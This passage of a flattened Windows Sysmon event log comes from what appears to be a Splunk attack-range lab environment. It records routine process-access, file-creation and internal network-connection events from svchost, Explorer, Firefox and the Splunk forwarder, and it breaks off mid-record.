11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.749{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299224Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.748{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:31.432{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDA5A4BCCF5CB04DB826BA7A85F6E140,SHA256=4F682B02FBAC6D39ADD4DE893DEDABE422D30AF2BEFA5E718FDDAFED14C9142A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223043Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:32.574{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22FD25BF54DAE499C944C3D9C8FEC956,SHA256=343AF435DCFCF30DFDEC909717221D928ECA4C50234563D591631134120D453F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:32.800{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64DAE11553CA300001DF47480485CFD5,SHA256=AC518F1FCD9DE1779FFA8B3680067D4F73CEBE8ED934F7A62D5DCD8E89181A9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:33.801{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28D01106A3277A7933AA6605D71D5ADD,SHA256=00A0551B9F4D9538CF33C81E67B2758C14BED92212A63569D4E644293C27107F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223044Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:33.746{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1A62A635C0C510A5D66D6E81FB72C16,SHA256=181B62F04D3B59867FF1EEE5A78AB6497B8E6C11AB18FACB38C12412A5B36D37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:33.664{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=39E38FFCE48D6461C3979C1D38C0521C,SHA256=1901AC080AE0782C5B94B57B9B6CFCDAFC1861913603766588804931FBBCFB41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:34.817{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=640F6E5A3B649AB60E1B896A9526691B,SHA256=7C98B2EE1CDED6F1D492A27375608EB920D27688BF165B76F9656F6A405DAED1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:32.561{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49596-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:34.761{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C3CC3BE0AB9DBDE7A37B586BD607352,SHA256=6B495A17F34AC6EC7EA492466D9DD9790DD30494070E2B63234B133ADFB8DD56,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:31.624{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51760-false10.0.1.12-8000- 23542300x8000000000000000299257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:35.847{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=533A67434D91D60F1FE68913CD68A8D2,SHA256=4BAD35018BB7A87F3B3953F37D5085230B3B0F4E565CC5910A0DF9C25D8EDD46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:35.808{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7485A366AAF70EB0B3BEB3C88A17E9A,SHA256=DA5B4B0A6B2F2877FE7E528AD0F246C78FDD9FAA6D7FD152BEBECDC9C9E9F0BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:36.824{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BC5CF8C7C6A65CB170074D5F3BEDA4A,SHA256=DC77AE0EC5ADF7E8009A2BB039333DE7261E900BA1FAE40A6AA7F1683771D13A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:36.862{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E61C57323AD19518F2089D4C6547F1BA,SHA256=09B696358037F6D6B3FA33EB46F8717F8E3992CC9838DB826535C812412958A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:37.899{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CBF4C65DDA1FFE089FBA351185DBDE6,SHA256=93D95F3F08E183D7F9AB13C34003FFA4CC2AFC146F8F0BB0897E8913ECC715FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:37.839{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE928A5826A87D2A774590D363F844A3,SHA256=9C5DD07596BAD2D05ABF42B063CF8018C28A77473B0012CB8D994229373D976A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:37.830{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:37.830{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=9331AB212BFF18739975E3428F7E933D,SHA256=4CD0679B190FF9FBC4E955BCD7D9CA64088031111ECB53BDF0D8EE26E2E34AE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:38.931{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43F2D5BFE36452B09903D7F97FC51FD0,SHA256=F4C0C26198542E4F5F5CE89CC49E56D4D4167295C143FA70C32762624A2185CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:38.855{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5286C5F04DF1865C17D902CC432FF0A2,SHA256=F364C0DAD0E2A50862513DFEECAA669B286658255C12D810C9A0598FB07507A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:39.932{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=866F30C5EF1588A8E6B47021544E178F,SHA256=271DB76D80181BA0B5530FB51614A9B7A4A31CEB4EE3D70081B030F2CBCC5C60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:39.855{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D143E1E8E2332838219B6146EAFB3EAD,SHA256=61C1E7AC6413E5C8436A7AF3A0F02E02708DA9B2A3278F2347850D3B05FD9BD8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:37.561{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49597-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000223051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:37.640{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51761-false10.0.1.12-8000- 23542300x8000000000000000299266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:40.962{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=832C434BE709A3E6850BBCE1CC00B8BC,SHA256=C696E95F32C121B4DEDF7D3B9F6A1CAF97630E3A906156CE8E2B357E6E71680F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:40.902{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=009096142C04749691797EF1A5578335,SHA256=0529FE71BCF56B411FEDC55B1429E1A01694536D80D6607B6C1DE4021B3F2281,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:40.747{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:41.981{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7CED3239FB2AAD4D282FB259C191ECE,SHA256=254208014DFE2F3DA1CBEB038E1E9D17D58AD79A261A897200293B49D4A6C99A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:41.902{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 